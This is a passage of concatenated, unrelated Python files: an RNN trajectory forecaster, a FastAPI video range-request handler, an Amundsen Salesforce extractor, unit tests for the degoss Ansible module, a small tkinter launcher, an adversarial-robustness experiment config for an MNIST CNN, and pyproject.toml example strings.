self.relu_context = nn.ReLU() self.relu_output = nn.ReLU() self.relu_dla_features = nn.ReLU() self.context_encoder = nn.Linear(self.num_hidden, int(self.num_hidden / 2)) self.dla_encoder = nn.Linear(self.num_hidden // 2, int(self.num_hidden / 2)) def forward(self, context, dla_features=None, future_length=5, past_length=10): outputs = [] # Fully connected encoded_context = self.context_encoder(context) # Relu encoded_context = self.relu_context(encoded_context) result = [] # generate input decoded_inputs = [] h_t = context for i in range(past_length - 1, -1, -1): h_t = self.decoder1(encoded_context, h_t) input = self.fc_in(h_t) # decoded_inputs.insert(0, input) decoded_inputs += [input] decoded_inputs = torch.stack(decoded_inputs, 1) result.append(decoded_inputs) if self.use_embedding: # encoded_dla_features = self.dla_encoder(dla_features) # encoded_dla_features = self.relu_dla_features(encoded_dla_features) encoded_context = torch.cat((encoded_context, dla_features), 1) h_t = context # forecast for i in range(future_length): h_t = self.decoder2(encoded_context, h_t) output = self.fc_out(self.relu_output(h_t)) outputs += [output] outputs = torch.stack(outputs, 1) result.append(outputs) return result class Cumsum(nn.Module): def forward(self, last, pred): # cumsum cs = last + torch.cumsum(pred, dim=1) return cs class ForeCastRNN(nn.Module): def __init__( self, input_size, output_size, future_length, num_hidden, use_embedding=False ): super(ForeCastRNN, self).__init__() self.num_hidden = num_hidden self.input_size = input_size self.output_size = output_size self.future_length = future_length self.use_embedding = use_embedding self.encoder = EncoderRNN(self.input_size, self.num_hidden) self.decoder = DecoderRNN( input_size, output_size, self.num_hidden, self.use_embedding ) self.final = Cumsum() def forward(self, prev_bboxes, features=None): context = self.encoder(prev_bboxes) past_length = prev_bboxes.shape[1] output = self.decoder( context, features, self.future_length, past_length=past_length ) last = prev_bboxes[:, -1:, :4] output[-1] = self.final(last, output[-1]) return output import os from typing import Tuple, BinaryIO from fastapi import HTTPException, status from fastapi.requests import Request from fastapi.responses import StreamingResponse def send_bytes_range_requests( file_obj: BinaryIO, start: int, end: int, chunk_size: int = 10_000 ): """Send a file in chunks using Range Requests specification RFC7233 `start` and `end` parameters are inclusive due to specification """ with file_obj as f: f.seek(start) while (pos := f.tell()) <= end: read_size = min(chunk_size, end + 1 - pos) yield f.read(read_size) def _get_range_header(range_header: str, file_size: int) -> Tuple[int, int]: def _invalid_range(): return HTTPException( status.HTTP_416_REQUESTED_RANGE_NOT_SATISFIABLE, detail=f"Invalid request range (Range:{range_header!r})", ) try: h = range_header.replace("bytes=", "").split("-") start = int(h[0]) if h[0] != "" else 0 end = int(h[1]) if h[1] != "" else file_size - 1 except ValueError: raise _invalid_range() if start > end or start < 0 or end > file_size - 1: raise _invalid_range() return start, end class VideoResponse(StreamingResponse): def __init__(self, request: Request, file_path: str, content_type: str): """Returns StreamingResponse using Range Requests of a given file""" file_size = os.stat(file_path).st_size range_header = request.headers.get("range") headers = { "content-type": content_type, "accept-ranges": "bytes", "content-encoding": "identity", "content-length": str(file_size), "access-control-expose-headers": ( "content-type, accept-ranges, content-length, " "content-range, content-encoding" ), } start = 0 end = file_size - 1 status_code = status.HTTP_200_OK if range_header is not None: start, end = _get_range_header(range_header, file_size) size = end - start + 1 headers["content-length"] = str(size) headers["content-range"] = f"bytes {start}-{end}/{file_size}" status_code = status.HTTP_206_PARTIAL_CONTENT super().__init__( send_bytes_range_requests(open(file_path, mode="rb"), start, end), headers=headers, status_code=status_code, ) # Copyright Contributors to the Amundsen project. # SPDX-License-Identifier: Apache-2.0 import logging from typing import ( Any, Dict, Iterator, List, Union, ) from pyhocon import ConfigTree from simple_salesforce import Salesforce from databuilder.extractor.base_extractor import Extractor from databuilder.models.table_metadata import ColumnMetadata, TableMetadata LOGGER = logging.getLogger(__name__) class SalesForceExtractor(Extractor): """ Extracts SalesForce objects """ # CONFIG KEYS CLUSTER_KEY = 'cluster_key' SCHEMA_KEY = 'schema_key' DATABASE_KEY = 'database_key' OBJECT_NAMES_KEY = "object_names" USERNAME_KEY = "username" PASSWORD_KEY = "password" SECURITY_TOKEN_KEY = "security_token" def init(self, conf: ConfigTree) -> None: self._cluster: str = conf.get_string(SalesForceExtractor.CLUSTER_KEY, "gold") self._database: str = conf.get_string(SalesForceExtractor.DATABASE_KEY) self._schema: str = conf.get_string(SalesForceExtractor.SCHEMA_KEY) self._object_names: List[str] = conf.get_list(SalesForceExtractor.OBJECT_NAMES_KEY, []) self._client: Salesforce = Salesforce( username=conf.get_string(SalesForceExtractor.USERNAME_KEY), password=conf.get_string(SalesForceExtractor.PASSWORD_KEY), security_token=conf.get_string(SalesForceExtractor.SECURITY_TOKEN_KEY), ) self._extract_iter: Union[None, Iterator] = None def extract(self) -> Union[TableMetadata, None]: if not self._extract_iter: self._extract_iter = self._get_extract_iter() try: return next(self._extract_iter) except StopIteration: return None def _get_extract_iter(self) -> Iterator[TableMetadata]: """ Extract the TableMetaData for each SalesForce Object :return: """ # Filter the sobjects if `OBJECT_NAMES_KEY` is set otherwise return all sobjects = [ sobject for sobject in self._client.describe()["sobjects"] if (len(self._object_names) == 0 or sobject["name"] in self._object_names) ] for i, sobject in enumerate(sobjects): object_name = sobject["name"] logging.info( f"({i+1}/{len(sobjects)}) Extracting SalesForce object ({object_name})" ) data = self._client.restful(path=f"sobjects/{object_name}/describe") yield self._extract_table_metadata(object_name=object_name, data=data) def _extract_table_metadata( self, object_name: str, data: Dict[str, Any] ) -> TableMetadata: # sort the fields by name because Amundsen requires a sort order for the columns and I did # not see one in the response fields = sorted(data["fields"], key=lambda x: x["name"]) columns = [ ColumnMetadata( name=f["name"], description=f["inlineHelpText"], col_type=f["type"], sort_order=i, ) for i, f in enumerate(fields) ] return TableMetadata( database=self._database, cluster=self._cluster, schema=self._schema, name=object_name, # TODO: Can we extract table description / does it exist? description=None, columns=columns, ) def get_scope(self) -> str: return 'extractor.salesforce_metadata' 10-100 #!/usr/bin/env python # -*- coding utf-8 -*- from callback_plugins.degoss_format import CallbackModule as DegossCallbackModule from library.degoss import ( CONSOLE_LOGGING_FORMAT, DISK_LOGGING_FORMAT, Degoss ) import json import logging import mock import os import subprocess import sys import unittest class DegossTestCase(unittest.TestCase): def __init__(self, *args, **kwargs): # call superclass constructor super(DegossTestCase, self).__init__(*args, **kwargs) self.module, self.service = None, None @property def __name__(self): return "DegossTestCase" def setUp(self): """Configure fixtures.""" self.logger = mock.MagicMock() self.module = mock.MagicMock() self.module.params = { # boolean stubs 'literal_true': True, 'literal_false': False, 'string_true_0': 'true', 'string_true_1': 'True', 'string_true_2': 'yes', 'string_true_3': 'on', 'string_false_0': 'false', 'string_false_1': 'False', 'string_false_2': 'no', 'string_false_3': 'off', # actual 'debug': True, 'clean': False, 'clean_on_failure': False, 'facts': '{ "fact": true }', 'test_dir': '/tmp/degoss.demo/tests', 'test_file': '/tmp/degoss.demo/tests/dingo.yml', 'tmp_root': '/tmp/degoss.demo', 'version': '0.3.6', } self.service = Degoss(sys.argv, self.module) self.service.logger = self.logger self.service.os, self.service.arch = 'linux', 'amd64' def test_get_boolean(self): """Test that boolean resolution works as expected.""" self.assertTrue(self.service.get_bool('literal_true')) self.assertFalse(self.service.get_bool('literal_false')) self.assertTrue(self.service.get_bool('string_true_0')) self.assertTrue(self.service.get_bool('string_true_1')) self.assertTrue(self.service.get_bool('string_true_2')) self.assertTrue(self.service.get_bool('string_true_3')) self.assertFalse(self.service.get_bool('string_false_0')) self.assertFalse(self.service.get_bool('string_false_1')) self.assertFalse(self.service.get_bool('string_false_2')) self.assertFalse(self.service.get_bool('string_false_3')) def test_constructor(self): """Tests that the constructor correctly assigns variables from the module input.""" self.assertEqual(True, self.service.debug) self.assertEqual(False, self.service.do_clean) self.assertEqual(False, self.service.clean_on_failure) self.assertEqual('/tmp/degoss.demo/logs', self.service.log_dir) self.assertEqual('/tmp/degoss.demo/logs/degoss.log', self.service.log_file) self.assertEqual('/tmp/degoss.demo/bin', self.service.bin_dir) self.assertEqual('/tmp/degoss.demo/tests', self.service.test_dir) self.assertEqual('dingo.yml', self.service.test_file) self.assertEqual('/tmp/degoss.demo', self.service.tmp_root) self.assertEqual('0.3.6', self.service.requested_version) self.assertIsNotNone(self.service.log_output) @mock.patch('library.degoss.platform.uname') def test_detect_environment(self, mock_uname): """Tests that environment detection works.""" mock_uname.return_value = ('Linux', None, None, None, 'x86_64') detected_os, detected_arch = self.service.detect_environment() self.assertEqual('linux', detected_os) self.assertEqual('amd64', detected_arch) mock_uname.return_value = ('Linux', None, None, None, 'i386') self.service = Degoss(sys.argv, self.module) detected_os, detected_arch = self.service.detect_environment() self.assertEqual('linux', detected_os) self.assertEqual('386', detected_arch) @mock.patch.object(Degoss, 'version', new_callable=mock.PropertyMock) def test_get_release_url(self, mock_version): mock_version.return_value = '0.3.6' self.service.os = 'linux' self.service.arch = 'amd64' self.assertEqual("https://github.com/aelsabbahy/goss/releases/download/v0.3.6/goss-linux-amd64", self.service.get_release_url()) @mock.patch.object(Degoss, 'get_latest_version') def test_version_latest(self, mock_get_latest_version): """Tests the version getter resolves the latest version properly.""" mock_get_latest_version.return_value = '9.9.9' self.module.params['version'] = 'latest' self.service = Degoss(sys.argv, self.module) self.assertEqual('9.9.9', self.service.version) @mock.patch.object(Degoss, 'get_latest_version') def test_version_hardcoded(self, mock_get_latest_version): """Tests that the version getter returns the specified version.""" self.assertEqual('0.3.6', self.service.version) mock_get_latest_version.assert_not_called() def test_failed(self): """Tests whether failure detection works as expected.""" self.service._has_run, self.service.failed_tests = False, 0 self.assertFalse(self.service.failed) self.service._has_run = True self.assertFalse(self.service.failed) self.service.failed_tests = 1 self.assertTrue(self.service.failed) def test_passed(self): """Tests whether success detection works as expected.""" self.service._has_run = False self.assertFalse(self.service.passed) self.service._has_run, self.service.failed_tests = False, 0 self.assertFalse(self.service.passed) self.service._has_run = True self.assertTrue(self.service.passed) self.service.failed_tests = 1 self.assertFalse(self.service.passed) def test_errored(self): """Tests whether error detection works as expected.""" self.service._has_run, self.service._errored = False, False self.assertFalse(self.service.errored) self.service._has_run = True self.assertFalse(self.service.errored) self.service._errored = True self.assertTrue(self.service.errored) def test_has_run(self): """Tests whether has_run reflects the execution state.""" self.service._has_run = False self.assertFalse(self.service.has_run) self.service._has_run = True self.assertTrue(self.service.has_run) def test_deserialize_dict(self): """Tests that dictionary deserialization works.""" self.service.logger = mock.MagicMock() # edge cases self.assertEqual({}, self.service.deserialize_dict(None)) self.assertEqual({}, self.service.deserialize_dict('')) self.assertEqual({}, self.service.deserialize_dict('[]')) # main case input_value = { 'a': 1, 'b': {}, 'c': [], 'd': { 'e': 'f' } } self.assertEqual(input_value, self.service.deserialize_dict(json.dumps(input_value))) @mock.patch.object(Degoss, 'setup_directories') @mock.patch.object(Degoss, 'setup_logging') @mock.patch.object(Degoss, 'detect_environment') def test_initialize(self, mock_detect_environment, mock_setup_logging, mock_setup_directories): """Tests initialization.""" mock_os, mock_arch = mock.MagicMock(), mock.MagicMock() mock_detect_environment.return_value = mock_os, mock_arch mock_logger = mock.MagicMock() mock_setup_logging.return_value = mock_logger self.service = Degoss(sys.argv, self.module) self.service.initialize() mock_detect_environment.assert_called() mock_setup_directories.assert_called() mock_setup_logging.assert_called() self.assertEqual(mock_arch, self.service.arch) self.assertEqual(mock_logger, self.service.logger) self.assertEqual(mock_os, self.service.os) @mock.patch('library.degoss.logging.FileHandler') @mock.patch('library.degoss.logging.StreamHandler') @mock.patch('library.degoss.logging.getLogger') @mock.patch('library.degoss.logging.addLevelName') def test_setup_logging(self, mock_add_level_name, mock_get_logger, mock_new_stream_handler, mock_new_file_handler): """Tests that logging setup works properly.""" mock_logger = mock.MagicMock() mock_get_logger.return_value = mock_logger mock_file_handler = mock.MagicMock() mock_new_file_handler.return_value = mock_file_handler mock_stream_handler = mock.MagicMock() mock_new_stream_handler.return_value = mock_stream_handler self.service = Degoss(sys.argv, self.module) logger = self.service.setup_logging() # global logging changes mock_add_level_name.assert_called_with(30, 'WARN') # our logger mock_get_logger.assert_called_with('degoss') mock_logger.setLevel.assert_called_with(logging.DEBUG) mock_logger.addHandler.assert_any_call(mock_file_handler) mock_logger.addHandler.assert_any_call(mock_stream_handler) # handlers mock_new_file_handler.assert_called_with(filename=self.service.log_file) mock_new_stream_handler.assert_called_with(stream=self.service.log_output) # return value must equal the logger created self.assertEqual(mock_logger, logger) # test with debug false self.module.params['debug'] = False self.service = Degoss(sys.argv, self.module) self.service.setup_logging() mock_logger.setLevel.assert_called_with(logging.INFO) @mock.patch('library.degoss.os.chmod') @mock.patch('library.degoss.os.makedirs') @mock.patch('library.degoss.os.path.isdir') def test_setup_directories(self, mock_is_dir, mock_makedirs, mock_chmod): """Tests that creation of directories works as expected.""" mock_is_dir.return_value = False self.service.os, self.service.arch = 'linux', 'amd64' self.service.setup_directories() mock_is_dir.assert_any_call(self.service.bin_dir) mock_is_dir.assert_any_call(self.service.log_dir) mock_makedirs.assert_any_call(self.service.bin_dir) mock_makedirs.assert_any_call(self.service.log_dir) mock_chmod.assert_any_call(self.service.bin_dir, 0o0755) mock_chmod.assert_any_call(self.service.log_dir, 0o0755) @mock.patch('library.degoss.Request') @mock.patch('library.degoss.urlopen') def test_request(self, mock_urlopen, mock_new_request): """Tests that degoss can create URL requests.""" mock_request = mock.MagicMock() mock_new_request.return_value = mock_request mock_response = mock.MagicMock() mock_response.getcode.return_value = 200 mock_response.geturl.return_value = 'redirect' mock_urlopen.return_value = mock_response status, response_url, response = self.service.request('httpdangus', 'RANG') mock_new_request.assert_called_with('httpdangus') mock_urlopen.assert_called_with(mock_request) self.assertEqual(mock_response, response) self.assertEqual(200, status) self.assertEqual('redirect', response_url) self.assertEqual('RANG', mock_request.get_method()) @mock.patch.object(Degoss, 'request') def test_get_latest_version(self, mock_new_request): """Tests that degoss can detect the latest version of Goss from GitHub.""" mock_request = mock.MagicMock() mock_new_request.return_value = 200, 'aelsabbahy/goss/releases/tag/v0.3.6', mock_request result = self.service.get_latest_version() self.assertEqual('0.3.6', result) mock_new_request.assert_called_with("https://github.com/aelsabbahy/goss/releases/latest") @mock.patch('library.degoss.os.chmod') @mock.patch.object(Degoss, 'request') @mock.patch.object(Degoss, 'get_release_url') def test_install(self, mock_get_release_url, mock_new_request, mock_chmod): """Tests that degoss can install Goss successfully.""" mock_get_release_url.return_value = 'fhwgads' # mock up the response as a file like object chunk_status = { 'emitted': False } def chunk_once(self): if not chunk_status['emitted']: chunk_status['emitted'] = True return "ABCDEFG" else: return None mock_response = mock.MagicMock() mock_response.read = chunk_once mock_new_request.return_value = 200, 'url', mock_response patched_open = mock.mock_open() with mock.patch("library.degoss.open", patched_open, create=True): self.service.install() mock_get_release_url.assert_called_with() mock_new_request.assert_called_with('fhwgads') patched_open.assert_called_with(self.service.executable, 'w') file_handle = patched_open() file_handle.write.assert_called_with('ABCDEFG') mock_chmod.assert_called_with(self.service.executable, 0o700) @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_success(self, mock_new_popen, mock_fail): """Tests that degoss can handle successful tests appropriately.""" result_dict = { 'summary': { 'failed-count': 0, 'test-count': 5, } } result_string = json.dumps(result_dict) mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_new_popen.return_value = mock_process # create facts and variables as strings to be deserialized self.service.facts = json.dumps({ 'fact1': True, 'fact2': 'yes', }) self.service.variables = json.dumps({ 'var1': ['yup'], 'var2': None, }) goss_variables = { 'ansible_fact1': True, 'ansible_fact2': 'yes', 'var1': ['yup'], 'var2': None, } patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() # it must have opened the result file patched_open.assert_called_with(self.service.result_file, 'w') file_handle = patched_open() # it must have written the result to the result file file_handle.write.assert_called_with(json.dumps(result_dict, indent=2, sort_keys=True)) # a new process should have been opened like this mock_new_popen.assert_called_with( [self.service.executable, '--gossfile', self.service.test_file, '--vars', '/dev/stdin', 'validate', '--no-color', '--format', 'json'], cwd=self.service.test_dir, env=dict(os.environ), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) # communicate must be called to send variables like this mock_process.communicate.assert_called_with(input=json.dumps(goss_variables)) # it must not have failed mock_fail.assert_not_called() self.assertTrue(self.service._has_run and self.service.has_run) self.assertFalse(self.service._errored) self.assertFalse(self.service.failed) self.assertEqual(0, self.service.failed_tests) self.assertEqual(5, self.service.total_tests) self.assertEqual(self.service.test_result, result_dict) @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_failure(self, mock_new_popen, mock_fail): """Tests that degoss can handle failed tests appropriately.""" result_dict = { 'results': [ { 'summary-line': "Test execution one failed.", 'successful': False }, { 'summary-line': "Test execution two failed.", 'successful': False }, { 'summary-line': "Passed", 'successful': True }, ], 'summary': { 'failed-count': 2, 'test-count': 5, } } result_string = json.dumps(result_dict) mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_new_popen.return_value = mock_process self.service.facts, self.service.variables = {}, {} patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() patched_open.assert_called_with(self.service.result_file, 'w') file_handle = patched_open() # result file must be written file_handle.write.assert_called_with(json.dumps(result_dict, indent=2, sort_keys=True)) # just stubs here, all the logic up until process execution completion is the same # process must be creaeted mock_new_popen.assert_called() # communicate must be passed varialbes mock_process.communicate.assert_called_with(input='{}') # instance variables self.assertEqual(result_dict, self.service.test_result) self.assertEqual(2, self.service.failed_tests) self.assertEqual(5, self.service.total_tests) self.assertEqual([ "Test execution one failed.", "Test execution two failed.", ], self.service.failed_messages) # it's a failure, but not a critical failue mock_fail.assert_not_called() @mock.patch.object(Degoss, 'fail') @mock.patch('library.degoss.subprocess.Popen') def test_run_tests_error(self, mock_new_popen, mock_fail): """Tests that degoss can handle error cases when running tests.""" result_string = "ERROR: some shit didn't work!" mock_process = mock.MagicMock() mock_process.communicate.return_value = result_string, None mock_process.returncode = 1 mock_new_popen.return_value = mock_process self.service.facts, self.service.variables = {}, {} patched_open = mock.mock_open() # run with mock.patch("library.degoss.open", patched_open, create=True): self.service.test() file_handle = patched_open() file_handle.write.assert_not_called() mock_new_popen.assert_called() mock_process.communicate.assert_called_with(input='{}') mock_fail.assert_called_with("Goss Execution Failed (Unable to run tests) (rc=1)", stdout_lines=[result_string], rc=1 ) self.assertTrue(self.service._errored) self.assertTrue(self.service.errored) @mock.patch.object(Degoss, 'errored', new_callable=mock.PropertyMock) @mock.patch.object(Degoss, 'failed', new_callable=mock.PropertyMock) @mock.patch('library.degoss.os.path.isdir') @mock.patch('library.degoss.os.path.exists') @mock.patch('library.degoss.shutil.rmtree') def test_clean_on_failure(self, mock_rmtree, mock_exists, mock_is_dir, mock_failed, mock_errored): """Tests that degoss respects the clean on failure flag appropriately.""" mock_exists.return_value, mock_is_dir.return_value = True, True self.service.clean_on_failure = True self.service.do_clean = True mock_failed.return_value, mock_errored.return_value = True, True # clean: True, clean_on_failure: True, failed: True, errored: True self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) mock_rmtree.reset_mock() # clean: True, clean_on_failure: False, failed: True, errored: True self.service.clean_on_failure = False self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: True, errored: False mock_failed.return_value, mock_errored.return_value = True, False self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: False, errored: True mock_failed.return_value, mock_errored.return_value = False, True self.service.clean() mock_rmtree.assert_not_called() # clean: True, clean_on_failure: False, failed: False, errored: False mock_failed.return_value, mock_errored.return_value = False, False self.service.do_clean = True self.service.clean_on_failure = False self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) mock_rmtree.reset_mock() # clean: True, clean_on_failure: True, failed: True, errored: True mock_failed.return_value, mock_errored.return_value = True, True self.service.do_clean = True self.service.clean_on_failure = True self.service.clean() mock_rmtree.assert_called_with(self.service.tmp_root) mock_rmtree.reset_mock() # clean: False, clean_on_failure: True, failed: True, errored: True # should supersede clean_on_failure self.service.do_clean, self.service.clean_on_failure = False, True self.service.clean() mock_rmtree.assert_not_called() @mock.patch.object(Degoss, 'failed', new_callable=mock.PropertyMock) @mock.patch.object(Degoss, 'clean') @mock.patch.object(Degoss, 'test') @mock.patch.object(Degoss, 'install') @mock.patch.object(Degoss, 'initialize') def test_execute(self, mock_initialize, mock_install, mock_test, mock_clean, mock_failed): """Tests entire workflow execution.""" self.module.exit_json = mock.MagicMock() # test success use case mock_failed.return_value = False self.service.failed_tests = 0 self.service.total_tests = 5 self.service.test_result = { 'time': 'go' } self.service.execute() mock_initialize.assert_called() mock_install.assert_called() mock_test.assert_called() mock_clean.assert_called() self.module.exit_json.assert_called_with(**{ 'changed': False, 'failed': False, 'failures': self.service.failed_messages, 'msg': "Goss Tests Passed", 'test_result': self.service.test_result, 'tests_failed': self.service.failed_tests, 'tests_passed': self.service.total_tests - self.service.failed_tests, 'tests_total': self.service.total_tests, }) self.module.exit_json.reset_mock() # test failure use case mock_failed.return_value = True self.service.failed_messages = [ 'one failed', 'two failed', ] self.service.failed_tests = 2 self.service.total_tests = 5 self.service.test_result = { 'oh': 'noes' } self.service.execute() self.module.exit_json.assert_called_with(**{ 'changed': False, 'failed': True, 'failures': self.service.failed_messages, 'msg': "Goss Tests Failed", 'test_result': self.service.test_result, 'tests_failed': self.service.failed_tests, 'tests_passed': self.service.total_tests - self.service.failed_tests, 'tests_total': self.service.total_tests, }) @mock.patch.object(Degoss, 'clean') def test_fail(self, mock_clean): """Tests that fail works as expected.""" self.module.exit_json = mock.MagicMock() self.service.log_output.write("one\n") self.service.log_output.write("two\n") self.service.fail("Hello", world=True) mock_clean.assert_called_with() self.module.exit_json.assert_called_with(**{ 'failed': True, 'failed_tests': None, 'module_failed': True, 'msg': "Hello", 'output_lines': ["one", "two"], 'test_count': None, 'world': True, }) if __name__ == "__main__": unittest.main() from tkinter import * from Packet import Packet from Window import Window window = Tk() #Creating the Window Object app = Window(window) #Initializing Object window.wm_title("Frame Decoder") # set window title window.geometry("600x130") #Setting up the dimension of the Window (600x110 CROPPED) window.resizable(False, False) #Avoiding resizing the window window.iconbitmap("package.ico") window.mainloop() #Necessary to start the configured window window.mainloop()vfleaking/max-margin import importlib from models import * import core exper = importlib.import_module('exper-final-mnist-cnn-loss-based-lr', __package__) FLAGS = { 'task': 'attack', 'eid': [10000], 'attack_type': core.AttackType.L_INF, 'attack_set': 'test', 'attack_N': 'all', 'attack_B': 128, 'attack_E': 10, 'attack_K': 100, # 'attack_eps_list': [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.2, 0.3],# for L_INF 'attack_eps_list': [0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19],# for L_INF **exper.FLAGS, 'lr': 0.1 } def main(argv): core.run(FLAGS) if __name__ == '__main__': core.app_start()repo-helper/pyproject-examples #!/usr/bin/env python3 # # example_configs.py """ Example configurations, as strings. """ # # Copyright © 2021 <> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. # __all__ = [ "MINIMAL_CONFIG", "KEYWORDS", "AUTHORS", "UNICODE", "MAINTAINERS", "CLASSIFIERS", "DEPENDENCIES", "OPTIONAL_DEPENDENCIES", "OPTIONAL_DEPENDENCIES_EMPTY_GROUP", "URLS", "ENTRY_POINTS", "COMPLETE_PROJECT_A", "COMPLETE_A", "COMPLETE_B", "COMPLETE_A_WITH_FILES", "DYNAMIC_REQUIREMENTS", "LONG_REQUIREMENTS", ] MINIMAL_CONFIG = '[project]\nname = "spam"\nversion = "2020.0.0"' KEYWORDS = f"""\ {MINIMAL_CONFIG} keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"] """ AUTHORS = f"""\ {MINIMAL_CONFIG} authors = [ {{email = ""}}, {{name = ""}} ] """ UNICODE = f"""\ {MINIMAL_CONFIG} description = "Factory ⸻ A code generator 🏭" authors = [{{name = ""}}] """ MAINTAINERS = f"""\ {MINIMAL_CONFIG} maintainers = [ {{name = "", email = ""}} ] """ CLASSIFIERS = f"""\ {MINIMAL_CONFIG} classifiers = [ "Development Status :: 4 - Beta", "Programming Language :: Python" ] """ DEPENDENCIES = f"""\ {MINIMAL_CONFIG} dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] """ OPTIONAL_DEPENDENCIES = f"""\ {MINIMAL_CONFIG} [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]", 'matplotlib>=3.0.0; platform_machine != "aarch64" or python_version > "3.6"', ] """ OPTIONAL_DEPENDENCIES_EMPTY_GROUP = f"""\ {MINIMAL_CONFIG} [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]", 'matplotlib>=3.0.0; platform_machine != "aarch64" or python_version > "3.6"', ] docs = [] """ URLS = f"""\ {MINIMAL_CONFIG} [project.urls] homepage = "example.com" documentation = "readthedocs.org" repository = "github.com" changelog = "github.com/me/spam/blob/master/CHANGELOG.md" """ ENTRY_POINTS = f"""\ {MINIMAL_CONFIG} [project.scripts] spam-cli = "spam:main_cli" [project.gui-scripts] spam-gui = "spam:main_gui" [project.entry-points."spam.magical"] tomatoes = "spam:main_tomatoes" [project.entry-points."flake8.extension"] SXL = "flake8_sphinx_links:Plugin" """ COMPLETE_PROJECT_A = """\ [project] name = "spam" version = "2020.0.0" description = "Lovely Spam! Wonderful Spam!" requires-python = ">=3.8" keywords = ["egg", "bacon", "sausage", "tomatoes", "Lobster Thermidor"] authors = [ {email = ""}, {name = ""} ] maintainers = [ {name = "", email = ""} ] classifiers = [ "Development Status :: 4 - Beta", "Programming Language :: Python" ] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [project.optional-dependencies] test = [ "pytest < 5.0.0", "pytest-cov[all]" ] [project.urls] homepage = "example.com" documentation = "readthedocs.org" repository = "github.com" changelog = "github.com/me/spam/blob/master/CHANGELOG.md" [project.scripts] spam-cli = "spam:main_cli" [project.gui-scripts] spam-gui = "spam:main_gui" [project.entry-points."spam.magical"] tomatoes = "spam:main_tomatoes" """ COMPLETE_A = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" """ COMPLETE_B = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" additional-files = [ "include whey/style.css", ] """ COMPLETE_A_WITH_FILES = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] license = { file = "LICENSE" } readme = "README.rst" [[project.authors]] email = "" name = "avis-Foster" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", 